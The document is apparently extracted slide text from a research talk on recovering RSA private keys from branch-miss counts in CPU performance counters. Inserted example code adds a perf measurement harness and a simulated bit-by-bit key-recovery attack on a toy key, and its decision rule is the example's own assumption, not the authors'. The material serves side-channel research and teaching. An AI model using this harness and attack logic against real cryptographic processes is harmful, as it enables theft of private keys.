Page 1: Utilizing Performance Monitors for Compromising keys of RSA on Intel Platforms

Sarani Bhattacharya and Debdeep Mukhopadhyay
Dept. of Computer Science and Engineering
Indian Institute of Technology, Kharagpur, India
10 March 2015

Page 2: Public-Key Cryptography

Page 3: RSA Encryption & Decryption

Plaintext: $M$
Encryption: $C = M^e \bmod n$, with $n = pq$
Ciphertext: $C$
Decryption: $M = C^d \bmod n$

From $n$, it is difficult to figure out $p, q$.
From $(n, e)$, it is difficult to figure out $d$.
From $(n, e)$ and $C$, it is difficult to figure out $M$ such that $C = M^e \bmod n$.

Page 4: Popular variants of Modular Exponentiation Algorithm

Page 5: SPA and Timing Side Channel Resistant Algorithm for Modular Exponentiation

Page 6: Primitive Algorithm for Performing Multiplication and Squaring

Page 7: Modelling Branch Miss as Side-Channel from HPC

The HPCs are profiled with performance monitoring tools, and the resulting event counts are treated as a side channel.

These tools provide a simple user interface to the counts of different hardware events.

Branch misses depend on the ability of the branch predictor to predict correctly whether future branches will be taken.

Page 8: Strong Correlation between two-bit predictor and system predictor

• $ perf stat -e branch-misses executable-name

As written, the command counts branch misses of the whole process in user and kernel mode alike; appending the :u modifier to the event name (branch-misses:u) restricts the count to user-space branches, and -r N repeats the run and prints the mean with its spread.

A direct correlation is observed between the branch misses read from the HPCs and those of a simulated 2-bit dynamic predictor over a sample exponent bitstream.

This confirms the assumption that a 2-bit dynamic predictor approximates the underlying system branch predictor.
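A harness for the measurement step of this slide and of the online phase, written for this page as an added example (it is not the authors' tooling). It assumes a hypothetical victim binary ./rsa_decrypt that decrypts the single ciphertext passed as its argument; the sample perf output it parses is constructed. The count is read from the machine-readable form of perf stat, whose report goes to stderr, and a counter that perf could not read is treated as an error instead of a zero.

```python
import subprocess
from statistics import mean

# Hypothetical victim: a binary that decrypts the single ciphertext given as its
# argument with the private key under attack (assumption of this example).
VICTIM = "./rsa_decrypt"
EVENT = "branch-misses:u"                     # :u restricts counting to user space
PERF = ["perf", "stat", "-x,", "-e", EVENT, "--"]

# Constructed sample of what `perf stat -x,` writes to stderr for one run.
SAMPLE_PERF_OUTPUT = "4123,,branch-misses:u,2514891,100.00,,\n"


def parse_perf_csv(stderr_text, event=EVENT):
    """Return the count of `event` from `perf stat -x,` CSV output. The fields are
    value,unit,event,run-time,percent-running,... A counter perf could not read
    appears as <not counted> or <not supported>; raise instead of returning a
    zero that would silently poison the averages."""
    for line in stderr_text.splitlines():
        fields = line.split(",")
        if len(fields) >= 3 and fields[2] == event:
            value = fields[0].strip()
            if value.startswith("<"):
                raise RuntimeError(f"{event}: {value}")
            return int(value)
    raise ValueError(f"{event} not present in perf output")


def measure(ciphertext, repeats=5, victim=VICTIM):
    """Run the victim on one ciphertext `repeats` times and average the counts;
    perf prints its report on stderr, the victim's own output is ignored."""
    counts = []
    for _ in range(repeats):
        proc = subprocess.run(PERF + [victim, str(ciphertext)],
                              capture_output=True, text=True, check=True)
        counts.append(parse_perf_csv(proc.stderr))
    return mean(counts)


def separation(miss_set, no_miss_set, measure_fn=measure):
    """Online-phase statistic for one hypothesis: mean branch misses over the
    ciphertexts expected to mispredict (M_j) minus the mean over those expected
    not to (NM_j). `measure_fn` is injectable so the logic runs without a PMU."""
    return mean(map(measure_fn, miss_set)) - mean(map(measure_fn, no_miss_set))
```

Whether an unprivileged user may read the counters at all is governed by kernel.perf_event_paranoid; with the upstream default of 2 only user-space events such as branch-misses:u are readable without privileges. The misses spent in process start-up are the same for every ciphertext and cancel in the separation, but slow drift in machine load does not, so measure the four sets interleaved rather than one after another.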

Page 9: Threat model of the Attack

The attacker knows the first i bits of the private key and wants to determine the next unknown bit, bit i+1.

Generate the trace of branches produced by the known i bits.

Under the assumption that bit i+1 has value j, where j ∈ {0, 1}, the corresponding next branch is simulated.

Page 10: Offline Phase of Attack

Page 11: Separation of Random Inputs

We ensure that no ciphertext is common to the pair of sets built for guess 0 and the pair built for guess 1, so that the sets are disjoint.

Page 12: Online Phase

Branch misses from the HPCs are monitored while the cipher executes over the entire secret key on each ciphertext of the 4 separate sets.

The probable next bit is decided as:
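The attack of Pages 7 to 12, simulated end to end as an added example (this is not the authors' code, and it also stands in for the algorithm slides of Pages 4 and 6, whose text is not on this page). Everything in it is constructed: a 16-bit toy key, Montgomery multiplication whose final conditional subtraction is the modelled data-dependent branch, a 2-bit saturating-counter predictor that serves both as the offline model and as the stand-in for the victim's hardware counter (the assumption of Page 8), a greedy construction of the four disjoint sets, and a separation-of-means decision rule, since the formula on this slide did not survive extraction. The choice of target branch (the squaring that opens iteration i+2 under each guess) is likewise this example's assumption. Requires Python 3.8 or later.

```python
import random
from statistics import mean

# Toy RSA key, constructed so the simulation finishes in seconds (not a real key).
P, Q, E = 251, 241, 17
N = P * Q
D = pow(E, -1, (P - 1) * (Q - 1))            # the private exponent to be recovered
KEY_BITS = [int(b) for b in bin(D)[2:]]      # MSB first, the order the loop reads it

# Montgomery constants: R = 2^K > N and N' = -N^-1 mod R.
K = N.bit_length()
R = 1 << K
N_PRIME = (-pow(N, -1, R)) % R

def mont_mul(a, b):
    """Montgomery product a*b*R^-1 mod N. Its final conditional subtraction is
    the data-dependent branch this example models; returns (result, taken)."""
    t = a * b
    m = ((t & (R - 1)) * N_PRIME) & (R - 1)
    u = (t + m * N) >> K                     # u < 2N, so one subtraction suffices
    taken = u >= N
    if taken:
        u -= N
    return u, taken

def to_mont(x):
    return (x * R) % N

def branch_trace(cbar, bits, extra_square=False):
    """Left-to-right square-and-multiply over `bits`; returns (acc, trace), trace
    being the reduction-branch outcome of every Montgomery multiplication. With
    extra_square, the squaring that opens the following iteration is appended."""
    acc, trace = R % N, []                   # R mod N is 1 in Montgomery form
    for b in bits:
        acc, taken = mont_mul(acc, acc)
        trace.append(taken)
        if b:
            acc, taken = mont_mul(acc, cbar)
            trace.append(taken)
    if extra_square:
        acc, taken = mont_mul(acc, acc)
        trace.append(taken)
    return acc, trace

def two_bit_mispredictions(trace, state=0):
    """2-bit saturating counter (states 0,1 predict not taken; 2,3 predict taken).
    Returns one bool per branch, True where the predictor missed."""
    misses = []
    for taken in trace:
        misses.append((state >= 2) != taken)
        state = min(3, state + 1) if taken else max(0, state - 1)
    return misses

def offline_target_miss(c, known_bits, guess):
    """Offline phase for one ciphertext: assume bit i+1 = guess, simulate the trace
    through the next squaring and report whether the model misses that branch
    (choosing it as the target is an assumption of this example)."""
    _, trace = branch_trace(to_mont(c), known_bits + [guess], extra_square=True)
    return two_bit_mispredictions(trace)[-1]

def victim_branch_misses(c, rng):
    """Stand-in for the HPC reading: branch misses of a full decryption of c under
    the true key, counted with the same predictor model, plus measurement jitter."""
    acc, trace = branch_trace(to_mont(c), KEY_BITS)
    trace.append(mont_mul(acc, 1)[1])        # conversion out of Montgomery form
    return sum(two_bit_mispredictions(trace)) + rng.gauss(0, 0.5)

def recover_next_bit(known_bits, readings, set_size=500):
    """Fill four mutually disjoint sets M_0, NM_0, M_1, NM_1 from the fixed pool,
    then choose the guess whose M/NM separation of average misses is larger
    (decision rule assumed for this example)."""
    sets = {(g, miss): [] for g in (0, 1) for miss in (True, False)}
    for c in readings:                       # each ciphertext lands in at most one set
        if all(len(s) == set_size for s in sets.values()):
            break
        options = [(g, offline_target_miss(c, known_bits, g)) for g in (0, 1)]
        target = min(options, key=lambda key: len(sets[key]))
        if len(sets[target]) < set_size:
            sets[target].append(c)
    sep = {g: mean(readings[c] for c in sets[(g, True)])
              - mean(readings[c] for c in sets[(g, False)]) for g in (0, 1)}
    return 1 if sep[1] > sep[0] else 0

def recover_private_exponent(seed=1, pool_size=6000):
    """Recover d bit by bit, assuming the attacker knows the key length and the
    leading 1 bit; the last bit is settled by a test decryption against (N, E)."""
    rng = random.Random(seed)
    pool = rng.sample(range(2, N - 1), pool_size)
    readings = {c: victim_branch_misses(c, rng) for c in pool}   # online phase
    known = [1]
    while len(known) < len(KEY_BITS) - 1:
        known.append(recover_next_bit(known, readings))
    for last in (0, 1):
        d = int("".join(map(str, known + [last])), 2)
        if pow(pow(2, E, N), d, N) == 2:
            return d
    raise RuntimeError("side-channel recovery produced an inconsistent key")
```

recover_private_exponent() returns the true d for the toy key. Under the correct hypothesis the ciphertexts in M_j really do cost one extra miss each, so the separation sits near one; under the wrong hypothesis the partition is unrelated to what the victim executes and the separation stays near zero. The pool is measured once and reused for every bit, which is what an attacker reading counters with perf would also do, and the final bit is brute-forced because no later squaring exists to serve as its target.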

Page 14: Experimental Validation

A large input set is separated by simulations over the bimodal and the two-level adaptive predictor.

Average branch misses are observed from the HPCs for each element of each set.

Each set has L = 1000 elements. The experiment is repeated over I = 1000 iterations.

Page 16: Comparison with Timing Side-channel

Page 17: Variation in separation with increasing number of ciphertexts

Page 18: Variation in separation with increase in number of iterations

Page 19: RSA-OAEP Randomized Padding Scheme

Page 20: Decryption in RSA-OAEP

Page 21: Separation for RSA-OAEP scheme

Page 22: Thank you.